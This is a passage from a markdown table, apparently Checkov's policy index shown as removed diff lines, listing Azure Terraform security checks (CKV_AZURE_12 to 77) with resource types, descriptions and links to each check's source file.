-| 1210 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) |
-| 1211 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) |
-| 1212 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) |
-| 1213 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) |
-| 1214 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) |
-| 1215 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) |
-| 1216 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) |
-| 1217 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) |
-| 1218 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) |
-| 1219 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) |
-| 1220 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) |
-| 1221 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) |
-| 1222 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) |
-| 1223 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) |
-| 1224 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) |
-| 1225 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) |
-| 1226 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) |
-| 1227 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) |
-| 1228 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) |
-| 1229 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) |
-| 1230 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) |
-| 1231 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) |
-| 1232 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) |
-| 1233 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) |
-| 1234 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) |
-| 1235 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) |
-| 1236 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) |
-| 1237 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) |
-| 1238 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) |
-| 1239 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) |
-| 1240 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) |
-| 1241 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) |
-| 1242 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) |
-| 1243 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) |
-| 1244 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) |
-| 1245 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) |
-| 1246 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) |
-| 1247 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) |
-| 1248 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) |
-| 1249 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) |
-| 1250 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) |
-| 1251 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) |
-| 1252 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) |
-| 1253 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) |
-| 1254 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) |
-| 1255 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) |
-| 1256 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) |
-| 1257 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) |
-| 1258 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) |
-| 1259 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) |
-| 1260 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform |
[StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | -| 1261 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | -| 1262 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | -| 1263 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | -| 1264 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | -| 1265 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1266 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1267 | CKV_AZURE_52 | resource | 
azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | -| 1268 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | -| 1269 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | -| 1270 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | -| 1271 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | -| 1272 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1273 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1274 | 
CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1275 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1276 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | -| 1277 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | -| 1278 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | -| 1279 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1280 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | 
[AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1281 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1282 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | -| 1283 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1284 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1285 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1286 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1287 | CKV_AZURE_66 | resource | 
azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1288 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1289 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1290 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1291 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | -| 1292 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | -| 1293 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | 
[FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1294 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1295 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1296 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1297 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1298 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1299 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1300 | 
CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1301 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1302 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1303 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1304 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1305 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1306 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | 
[AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1307 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1308 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1309 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | -| 1310 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | -| 1311 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | -| 1312 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1313 | CKV_AZURE_77 | resource | azurerm_network_security_rule | 
